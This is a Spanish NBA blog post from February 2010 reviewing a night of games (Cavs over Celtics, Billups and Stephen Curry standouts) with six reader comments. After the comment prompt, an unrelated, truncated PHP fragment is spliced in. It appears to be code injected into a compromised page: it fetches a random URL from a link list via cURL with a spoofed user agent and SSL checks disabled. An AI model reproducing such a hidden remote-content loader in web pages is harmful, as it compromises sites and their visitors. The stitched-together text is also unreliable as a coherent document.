La Crónica (25/02/2010)

26 de February de 2010 por txusma

La historia de la temporada. Buen inicio de Boston de la mano de un Rajon Rondo inmenso, y un último cuarto con los Cavs destrozando a los Celtics a base de defensa y dejándolos en un 3 de 21 en tiros de campo. Fue tal el descosido que los últimos minutos de los Cavs los disputaron Delonte West, Jamario Moon, Jawad Williams, JJ Hickson y Leon Powe, que volvió a disputar un partido de baloncesto después de mucho tiempo. Tiene tiempo de sobra para llegar en relativa forma a los Playoffs donde se puede convertir en otra valiosa pieza más del entremado de los Cavs. Ayer sin Shaq, lesionado a partir del segundo cuarto y con un Jamison aún en proceso de adaptación pasaron por encima de los verdes. ¿Dan miedito o no dan miedito? De todas maneras hay que destacar que Paul Pierce no jugó el partido y cuando Pierce no juega con los Celtics estos pierden parte de su alma. Rondo puede hacer números pero el corazón lo pone el claro líder de la franquicia.

Al lado de este, los otros 2 partidos de la jornada se antojaban algo descafeinados y el Denver-Golden State lo fue en parte. Billups cuajó el mejor partido de la temporada y los Nuggets pasaron por encima de los Warriors con relativa facilidad y gustándose. El Milwaukee-Indiana, en cambio, fue mucho más emocionante con un John Salmons clave en los minutos finales. Desde su fichaje, los Bucks han encadenado 5 victorias consecutivas y parecen preparados para asaltar los Playoffs. De momento son séptimos y subiendo.

PREMIOS

MVP: Chauncey Billups parece saber en todo momento lo que hacer. ¿Qué hay que anotar? Se anota. ¿Qué hoy distribuir más el balón? Se distribuye. ¿Qué toca defender? Se defiende. Anoche tocó hacer de todo un poco: 37 puntos, 6 rebotes y 9 asistencias.

Rookie: 30 puntos, 7 rebotes, 13 asistencias, 2 robos, 1 tapón. El partidazo de Stephen Curry fue de órdago…

Sorpresa: El turco Ersan Ilyasova parece que no se ha hecho con el puesto de titular pero su aportación desde el banquillo sigue siendo importantísima. 17 puntos y 5 rebotes.

Decepción: Que Devean George siga jugando al baloncesto y encima que dispute 36 minutos con los Warriors…

Esfuerzo en vano: El de Stephen Curry, sin duda.

Comenta

6 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Chaaaaauuuuuuncyyyyy!!!! qué jugador madre mía.
    Operaciones de Dummars:

    – Eleccion de Milicic por delante de Carmelo Anthony.
    – Traspaso de Billups a cambio de Iverson
    – Fichaje de Gordon y Villanueva

    El anillo de 2004 lo justifica todo?

    Celtics tienen que pensar ya en reconstruir. Veremos como acaba el tema Garnett. Qué pena esa rodilla…

    Un saludo,
    Pablo

      Citar

  2. Viva_Dirk dice:
    #2

    No solo el anillo de 2004, sino un montón de años al máximo nivel. Salvo la elección de Milicic, las otras 2 me parecen acertadas ya que ha buscado ir reconstruyendo sin tener que pasar por años pésimos, estoy seguro de que Gordon dará un gran rendimiento y el contrato de Villanueva no es tan alto, sin contar que es un jugador de muchísima clase.

    De momento no me atrevo a cuestionar las decisiones de Dumars. Otra cosa que hizo mal fue poner a Curry al frente del equipo.

      Citar

  3. Txusma dice:
    #3

    Hay franquicias que matarían por un solo anillo…

      Citar

  4. Rompe dice:
    #4

    Hombre, el partido de Lebron, como siempre, fue merecedor del MVP! Al menos compartido con el gran Chauncey…

      Citar

  5. jhc dice:
    #5

    Para mi la sorpresa fué Varejao le sienta bien el banquillo 14 puntos 10 rebotes 3 tapones no esta nada mal el partido del brasileño

      Citar

  6. NBA LAKERS BLOG dice:
    #6

    Una lastima el bajón de Boston, eso no habla muy bien de ellos. Lo de los Nuggets ya no impresiona, están en otro nivel al parecer.

    Te espero en nuestro blog de los Lakers 😉

    Un abrazo grande!

    -NLB-

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>